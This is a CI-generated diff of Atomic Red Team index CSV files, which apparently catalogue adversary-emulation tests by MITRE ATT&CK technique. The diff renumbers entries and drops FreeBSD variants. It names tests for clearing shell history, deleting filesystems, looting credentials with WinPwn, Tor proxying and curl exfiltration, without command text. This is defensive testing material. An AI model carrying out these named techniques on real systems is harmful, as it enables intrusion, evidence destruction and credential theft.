Generated docs from job=generate-docs branch=master [ci skip]

atomics/Indexes/Indexes-CSV/index.csv

@@ -130,24 +130,17 @@ defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,10,Msiexec.exe
 defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,11,Msiexec.exe - Execute Remote MSI file,44a4bedf-ffe3-452e-bee4-6925ab125662,command_prompt
 defense-evasion,T1556.002,Modify Authentication Process: Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
 defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,1,Clear Bash history (rm),a934276e-2be5-4a36-93fd-98adbb5bd4fc,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,2,Clear sh history (rm),448893f8-1d5d-4ae2-9017-7fcd73a7e100,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,3,Clear Bash history (echo),cbf506a5-dd78-43e5-be7e-a46b7c7a0a11,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,4,Clear sh history (echo),a4d63cb3-9ed9-4837-9480-5bf6b09a6c96,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,5,Clear Bash history (cat dev/null),b1251c35-dcd3-4ea1-86da-36d27b54f31f,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,6,Clear sh history (cat dev/null),ecaefd53-6fa4-4781-ba51-d9d6fb94dbdc,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,7,Clear Bash history (ln dev/null),23d348f3-cc5c-4ba9-bd0a-ae09069f0914,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,8,Clear sh history (ln dev/null),3126aa7a-8768-456f-ae05-6ab2d4accfdd,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,9,Clear Bash history (truncate),47966a1d-df4f-4078-af65-db6d9aa20739,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,10,Clear sh history (truncate),e14d9bb0-c853-4503-aa89-739d5c0a5818,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,11,Clear history of a bunch of shells,7e6721df-5f08-4370-9255-f06d8a77af4c,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,12,Clear history of a bunch of shells (freebsd),9bf7c8af-5e12-42ea-bf6b-b0348fb9dfb0,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,13,Clear and Disable Bash History Logging,784e4011-bd1a-4ecd-a63a-8feb278512e6,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,14,Use Space Before Command to Avoid Logging to History,53b03a54-4529-4992-852d-a00b4b7215a6,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,15,Disable Bash History Logging with SSH -T,5f8abd62-f615-43c5-b6be-f780f25790a1,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,16,Disable sh History Logging with SSH -T (freebsd),ec3f2306-dd19-4c4b-bed7-92d20e9b1dee,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,17,Prevent Powershell History Logging,2f898b81-3e97-4abb-bc3f-a95138988370,powershell
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,18,Clear Powershell History by Deleting History File,da75ae8d-26d6-4483-b0fe-700e4df4f037,powershell
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,19,Set Custom AddToHistoryHandler to Avoid History File Logging,1d0d9aa6-6111-4f89-927b-53e8afae7f94,powershell
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,2,Clear Bash history (echo),cbf506a5-dd78-43e5-be7e-a46b7c7a0a11,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,3,Clear Bash history (cat dev/null),b1251c35-dcd3-4ea1-86da-36d27b54f31f,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,4,Clear Bash history (ln dev/null),23d348f3-cc5c-4ba9-bd0a-ae09069f0914,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,5,Clear Bash history (truncate),47966a1d-df4f-4078-af65-db6d9aa20739,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,6,Clear history of a bunch of shells,7e6721df-5f08-4370-9255-f06d8a77af4c,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,7,Clear and Disable Bash History Logging,784e4011-bd1a-4ecd-a63a-8feb278512e6,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,8,Use Space Before Command to Avoid Logging to History,53b03a54-4529-4992-852d-a00b4b7215a6,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,9,Disable Bash History Logging with SSH -T,5f8abd62-f615-43c5-b6be-f780f25790a1,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,10,Prevent Powershell History Logging,2f898b81-3e97-4abb-bc3f-a95138988370,powershell
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,11,Clear Powershell History by Deleting History File,da75ae8d-26d6-4483-b0fe-700e4df4f037,powershell
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,12,Set Custom AddToHistoryHandler to Avoid History File Logging,1d0d9aa6-6111-4f89-927b-53e8afae7f94,powershell
 defense-evasion,T1202,Indirect Command Execution,1,Indirect Command Execution - pcalua.exe,cecfea7a-5f03-4cdd-8bc8-6f7c22862440,command_prompt
 defense-evasion,T1202,Indirect Command Execution,2,Indirect Command Execution - forfiles.exe,8b34a448-40d9-4fc3-a8c8-4bb286faf7dc,command_prompt
 defense-evasion,T1202,Indirect Command Execution,3,Indirect Command Execution - conhost.exe,cf3391e0-b482-4b02-87fc-ca8362269b29,command_prompt
@@ -513,10 +506,9 @@ defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,4,Delete a si
 defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,5,Delete an entire folder - Windows cmd,ded937c4-2add-42f7-9c2c-c742b7a98698,command_prompt
 defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,6,Delete a single file - Windows PowerShell,9dee89bd-9a98-4c4f-9e2d-4256690b0e72,powershell
 defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,7,Delete an entire folder - Windows PowerShell,edd779e4-a509-4cba-8dfa-a112543dbfb1,powershell
-defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,8,Delete Filesystem - Linux,f3aa95fe-4f10-4485-ad26-abf22a764c52,bash
-defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,9,Delete Filesystem - FreeBSD,b5aaca7e-a48f-4f1b-8f0f-a27b8f516608,sh
-defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,10,Delete Prefetch File,36f96049-0ad7-4a5f-8418-460acaeb92fb,powershell
-defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,11,Delete TeamViewer Log Files,69f50a5f-967c-4327-a5bb-e1a9a9983785,powershell
+defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,8,Delete Filesystem - Linux,f3aa95fe-4f10-4485-ad26-abf22a764c52,sh
+defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,9,Delete Prefetch File,36f96049-0ad7-4a5f-8418-460acaeb92fb,powershell
+defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,10,Delete TeamViewer Log Files,69f50a5f-967c-4327-a5bb-e1a9a9983785,powershell
 defense-evasion,T1221,Template Injection,1,WINWORD Remote Template Injection,1489e08a-82c7-44ee-b769-51b72d03521d,command_prompt
 defense-evasion,T1027.002,Obfuscated Files or Information: Software Packing,1,Binary simply packed by UPX (linux),11c46cd8-e471-450e-acb8-52a1216ae6a4,sh
 defense-evasion,T1027.002,Obfuscated Files or Information: Software Packing,2,"Binary packed by UPX, with modified headers (linux)",f06197f8-ff46-48c2-a0c6-afc1b50665e1,sh
@@ -564,11 +556,10 @@ defense-evasion,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing us
 defense-evasion,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
 defense-evasion,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
 defense-evasion,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
-defense-evasion,T1078.003,Valid Accounts: Local Accounts,9,Create local account (FreeBSD),95158cc9-8f6d-4889-9531-9be3f7f095e0,sh
-defense-evasion,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
-defense-evasion,T1078.003,Valid Accounts: Local Accounts,11,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
-defense-evasion,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
-defense-evasion,T1078.003,Valid Accounts: Local Accounts,13,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,9,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,11,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
 defense-evasion,T1127,Trusted Developer Utilities Proxy Execution,1,Lolbin Jsc.exe compile javascript to exe,1ec1c269-d6bd-49e7-b71b-a461f7fa7bc8,command_prompt
 defense-evasion,T1127,Trusted Developer Utilities Proxy Execution,2,Lolbin Jsc.exe compile javascript to dll,3fc9fea2-871d-414d-8ef6-02e85e322b80,command_prompt
 defense-evasion,T1574.012,Hijack Execution Flow: COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
@@ -814,11 +805,10 @@ privilege-escalation,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existi
 privilege-escalation,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
 privilege-escalation,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
 privilege-escalation,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
-privilege-escalation,T1078.003,Valid Accounts: Local Accounts,9,Create local account (FreeBSD),95158cc9-8f6d-4889-9531-9be3f7f095e0,sh
-privilege-escalation,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
-privilege-escalation,T1078.003,Valid Accounts: Local Accounts,11,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
-privilege-escalation,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
-privilege-escalation,T1078.003,Valid Accounts: Local Accounts,13,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,9,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,11,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
 privilege-escalation,T1574.012,Hijack Execution Flow: COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
 privilege-escalation,T1574.012,Hijack Execution Flow: COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
 privilege-escalation,T1574.012,Hijack Execution Flow: COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
@@ -909,14 +899,10 @@ execution,T1059.004,Command and Scripting Interpreter: Bash,6,What shell is runn
 execution,T1059.004,Command and Scripting Interpreter: Bash,7,What shells are available,bf23c7dc-1004-4949-8262-4c1d1ef87702,sh
 execution,T1059.004,Command and Scripting Interpreter: Bash,8,Command line scripts,b04ed73c-7d43-4dc8-b563-a2fc595cba1a,sh
 execution,T1059.004,Command and Scripting Interpreter: Bash,9,Obfuscated command line scripts,5bec4cc8-f41e-437b-b417-33ff60acf9af,sh
-execution,T1059.004,Command and Scripting Interpreter: Bash,10,Obfuscated command line scripts (freebsd),5dc1d9dd-f396-4420-b985-32b1c4f79062,sh
-execution,T1059.004,Command and Scripting Interpreter: Bash,11,Change login shell,c7ac59cb-13cc-4622-81dc-6d2fee9bfac7,bash
-execution,T1059.004,Command and Scripting Interpreter: Bash,12,Change login shell (freebsd),33b68b9b-4988-4caf-9600-31b7bf04227c,sh
-execution,T1059.004,Command and Scripting Interpreter: Bash,13,Environment variable scripts,bdaebd56-368b-4970-a523-f905ff4a8a51,bash
-execution,T1059.004,Command and Scripting Interpreter: Bash,14,Environment variable scripts (freebsd),663b205d-2121-48a3-a6f9-8c9d4d87dfee,sh
-execution,T1059.004,Command and Scripting Interpreter: Bash,15,Detecting pipe-to-shell,fca246a8-a585-4f28-a2df-6495973976a1,bash
-execution,T1059.004,Command and Scripting Interpreter: Bash,16,Detecting pipe-to-shell (freebsd),1a06b1ec-0cca-49db-a222-3ebb6ef25632,sh
-execution,T1059.004,Command and Scripting Interpreter: Bash,17,Current kernel information enumeration,3a53734a-9e26-4f4b-ad15-059e767f5f14,sh
+execution,T1059.004,Command and Scripting Interpreter: Bash,10,Change login shell,c7ac59cb-13cc-4622-81dc-6d2fee9bfac7,bash
+execution,T1059.004,Command and Scripting Interpreter: Bash,11,Environment variable scripts,bdaebd56-368b-4970-a523-f905ff4a8a51,sh
+execution,T1059.004,Command and Scripting Interpreter: Bash,12,Detecting pipe-to-shell,fca246a8-a585-4f28-a2df-6495973976a1,sh
+execution,T1059.004,Command and Scripting Interpreter: Bash,13,Current kernel information enumeration,3a53734a-9e26-4f4b-ad15-059e767f5f14,sh
 execution,T1559,Inter-Process Communication,1,Cobalt Strike Artifact Kit pipe,bd13b9fc-b758-496a-b81a-397462f82c72,command_prompt
 execution,T1559,Inter-Process Communication,2,Cobalt Strike Lateral Movement (psexec_psh) pipe,830c8b6c-7a70-4f40-b975-8bbe74558acd,command_prompt
 execution,T1559,Inter-Process Communication,3,Cobalt Strike SSH (postex_ssh) pipe,d1f72fa0-5bc2-4b4b-bd1e-43b6e8cfb2e6,command_prompt
@@ -1158,11 +1144,10 @@ persistence,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user t
 persistence,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
 persistence,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
 persistence,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
-persistence,T1078.003,Valid Accounts: Local Accounts,9,Create local account (FreeBSD),95158cc9-8f6d-4889-9531-9be3f7f095e0,sh
-persistence,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
-persistence,T1078.003,Valid Accounts: Local Accounts,11,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
-persistence,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
-persistence,T1078.003,Valid Accounts: Local Accounts,13,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
+persistence,T1078.003,Valid Accounts: Local Accounts,9,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
+persistence,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
+persistence,T1078.003,Valid Accounts: Local Accounts,11,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
+persistence,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
 persistence,T1574.012,Hijack Execution Flow: COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
 persistence,T1574.012,Hijack Execution Flow: COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
 persistence,T1574.012,Hijack Execution Flow: COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
@@ -1190,9 +1175,8 @@ command-and-control,T1572,Protocol Tunneling,3,DNS over HTTPS Long Domain Query,
 command-and-control,T1572,Protocol Tunneling,4,run ngrok,4cdc9fc7-53fb-4894-9f0c-64836943ea60,powershell
 command-and-control,T1090.003,Proxy: Multi-hop Proxy,1,Psiphon,14d55ca0-920e-4b44-8425-37eedd72b173,powershell
 command-and-control,T1090.003,Proxy: Multi-hop Proxy,2,Tor Proxy Usage - Windows,7b9d85e5-c4ce-4434-8060-d3de83595e69,powershell
-command-and-control,T1090.003,Proxy: Multi-hop Proxy,3,Tor Proxy Usage - Debian/Ubuntu,5ff9d047-6e9c-4357-b39b-5cf89d9b59c7,sh
+command-and-control,T1090.003,Proxy: Multi-hop Proxy,3,Tor Proxy Usage - Debian/Ubuntu/FreeBSD,5ff9d047-6e9c-4357-b39b-5cf89d9b59c7,sh
 command-and-control,T1090.003,Proxy: Multi-hop Proxy,4,Tor Proxy Usage - MacOS,12631354-fdbc-4164-92be-402527e748da,sh
-command-and-control,T1090.003,Proxy: Multi-hop Proxy,5,Tor Proxy Usage - FreeBSD,550ec67d-a99e-408b-816a-689271b27d2a,sh
 command-and-control,T1571,Non-Standard Port,1,Testing usage of uncommonly used port with PowerShell,21fe622f-8e53-4b31-ba83-6d333c2583f4,powershell
 command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used port,5db21e1d-dd9c-4a50-b885-b1e748912767,sh
 command-and-control,T1573,Encrypted Channel,1,OpenSSL C2,21caf58e-87ad-440c-a6b8-3ac259964003,powershell
@@ -1263,9 +1247,8 @@ collection,T1123,Audio Capture,1,using device audio capture commandlet,9c3ad250-
 collection,T1123,Audio Capture,2,Registry artefact when application use microphone,7a21cce2-6ada-4f7c-afd9-e1e9c481e44a,command_prompt
 collection,T1123,Audio Capture,3,using Quicktime Player,c7a0bb71-70ce-4a53-b115-881f241b795b,sh
 collection,T1074.001,Data Staged: Local Data Staging,1,Stage data from Discovery.bat,107706a5-6f9f-451a-adae-bab8c667829f,powershell
-collection,T1074.001,Data Staged: Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
-collection,T1074.001,Data Staged: Local Data Staging,3,Stage data from Discovery.sh (freebsd),4fca7b49-379d-4493-8890-d6297750fa46,sh
-collection,T1074.001,Data Staged: Local Data Staging,4,Zip a Folder with PowerShell for Staging in Temp,a57fbe4b-3440-452a-88a7-943531ac872a,powershell
+collection,T1074.001,Data Staged: Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,sh
+collection,T1074.001,Data Staged: Local Data Staging,3,Zip a Folder with PowerShell for Staging in Temp,a57fbe4b-3440-452a-88a7-943531ac872a,powershell
 collection,T1114.001,Email Collection: Local Email Collection,1,Email Collection with PowerShell Get-Inbox,3f1b5096-0139-4736-9b78-19bcb02bb1cb,powershell
 collection,T1119,Automated Collection,1,Automated Collection Command Prompt,cb379146-53f1-43e0-b884-7ce2c635ff5b,command_prompt
 collection,T1119,Automated Collection,2,Automated Collection PowerShell,634bd9b9-dc83-4229-b19f-7f83ba9ad313,powershell
@@ -1546,12 +1529,11 @@ discovery,T1087.001,Account Discovery: Local Account,2,View sudoers access,fed9b
 discovery,T1087.001,Account Discovery: Local Account,3,View accounts with UID 0,c955a599-3653-4fe5-b631-f11c00eb0397,sh
 discovery,T1087.001,Account Discovery: Local Account,4,List opened files by user,7e46c7a5-0142-45be-a858-1a3ecb4fd3cb,sh
 discovery,T1087.001,Account Discovery: Local Account,5,Show if a user account has ever logged in remotely,0f0b6a29-08c3-44ad-a30b-47fd996b2110,sh
-discovery,T1087.001,Account Discovery: Local Account,6,Show if a user account has ever logged in remotely (freebsd),0f73418f-d680-4383-8a24-87bc97fe4e35,sh
-discovery,T1087.001,Account Discovery: Local Account,7,Enumerate users and groups,e6f36545-dc1e-47f0-9f48-7f730f54a02e,sh
-discovery,T1087.001,Account Discovery: Local Account,8,Enumerate users and groups,319e9f6c-7a9e-432e-8c62-9385c803b6f2,sh
-discovery,T1087.001,Account Discovery: Local Account,9,Enumerate all accounts on Windows (Local),80887bec-5a9b-4efc-a81d-f83eb2eb32ab,command_prompt
-discovery,T1087.001,Account Discovery: Local Account,10,Enumerate all accounts via PowerShell (Local),ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b,powershell
-discovery,T1087.001,Account Discovery: Local Account,11,Enumerate logged on users via CMD (Local),a138085e-bfe5-46ba-a242-74a6fb884af3,command_prompt
+discovery,T1087.001,Account Discovery: Local Account,6,Enumerate users and groups,e6f36545-dc1e-47f0-9f48-7f730f54a02e,sh
+discovery,T1087.001,Account Discovery: Local Account,7,Enumerate users and groups,319e9f6c-7a9e-432e-8c62-9385c803b6f2,sh
+discovery,T1087.001,Account Discovery: Local Account,8,Enumerate all accounts on Windows (Local),80887bec-5a9b-4efc-a81d-f83eb2eb32ab,command_prompt
+discovery,T1087.001,Account Discovery: Local Account,9,Enumerate all accounts via PowerShell (Local),ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b,powershell
+discovery,T1087.001,Account Discovery: Local Account,10,Enumerate logged on users via CMD (Local),a138085e-bfe5-46ba-a242-74a6fb884af3,command_prompt
 discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh
 discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,2,Detect Virtualization Environment (FreeBSD),e129d73b-3e03-4ae9-bf1e-67fc8921e0fd,sh
 discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,3,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
@@ -1828,11 +1810,10 @@ initial-access,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing use
 initial-access,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
 initial-access,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
 initial-access,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
-initial-access,T1078.003,Valid Accounts: Local Accounts,9,Create local account (FreeBSD),95158cc9-8f6d-4889-9531-9be3f7f095e0,sh
-initial-access,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
-initial-access,T1078.003,Valid Accounts: Local Accounts,11,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
-initial-access,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
-initial-access,T1078.003,Valid Accounts: Local Accounts,13,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
+initial-access,T1078.003,Valid Accounts: Local Accounts,9,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
+initial-access,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
+initial-access,T1078.003,Valid Accounts: Local Accounts,11,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
+initial-access,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
 exfiltration,T1020,Automated Exfiltration,1,IcedID Botnet HTTP PUT,9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0,powershell
 exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,1,Exfiltrate data HTTPS using curl windows,1cdf2fb0-51b6-4fd8-96af-77020d5f1bf0,command_prompt
 exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,2,"Exfiltrate data HTTPS using curl freebsd,linux or macos",4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01,bash

atomics/Indexes/Indexes-CSV/linux-index.csv

@@ -39,21 +39,14 @@ defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Ma
 defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",19,Overwrite Linux Mail Spool,1602ff76-ed7f-4c94-b550-2f727b4782d4,bash
 defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",20,Overwrite Linux Log,d304b2dc-90b4-4465-a650-16ddd503f7b5,bash
 defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,1,Clear Bash history (rm),a934276e-2be5-4a36-93fd-98adbb5bd4fc,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,2,Clear sh history (rm),448893f8-1d5d-4ae2-9017-7fcd73a7e100,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,3,Clear Bash history (echo),cbf506a5-dd78-43e5-be7e-a46b7c7a0a11,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,4,Clear sh history (echo),a4d63cb3-9ed9-4837-9480-5bf6b09a6c96,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,5,Clear Bash history (cat dev/null),b1251c35-dcd3-4ea1-86da-36d27b54f31f,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,6,Clear sh history (cat dev/null),ecaefd53-6fa4-4781-ba51-d9d6fb94dbdc,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,7,Clear Bash history (ln dev/null),23d348f3-cc5c-4ba9-bd0a-ae09069f0914,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,8,Clear sh history (ln dev/null),3126aa7a-8768-456f-ae05-6ab2d4accfdd,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,9,Clear Bash history (truncate),47966a1d-df4f-4078-af65-db6d9aa20739,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,10,Clear sh history (truncate),e14d9bb0-c853-4503-aa89-739d5c0a5818,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,11,Clear history of a bunch of shells,7e6721df-5f08-4370-9255-f06d8a77af4c,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,12,Clear history of a bunch of shells (freebsd),9bf7c8af-5e12-42ea-bf6b-b0348fb9dfb0,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,13,Clear and Disable Bash History Logging,784e4011-bd1a-4ecd-a63a-8feb278512e6,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,14,Use Space Before Command to Avoid Logging to History,53b03a54-4529-4992-852d-a00b4b7215a6,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,15,Disable Bash History Logging with SSH -T,5f8abd62-f615-43c5-b6be-f780f25790a1,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,16,Disable sh History Logging with SSH -T (freebsd),ec3f2306-dd19-4c4b-bed7-92d20e9b1dee,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,2,Clear Bash history (echo),cbf506a5-dd78-43e5-be7e-a46b7c7a0a11,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,3,Clear Bash history (cat dev/null),b1251c35-dcd3-4ea1-86da-36d27b54f31f,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,4,Clear Bash history (ln dev/null),23d348f3-cc5c-4ba9-bd0a-ae09069f0914,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,5,Clear Bash history (truncate),47966a1d-df4f-4078-af65-db6d9aa20739,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,6,Clear history of a bunch of shells,7e6721df-5f08-4370-9255-f06d8a77af4c,sh
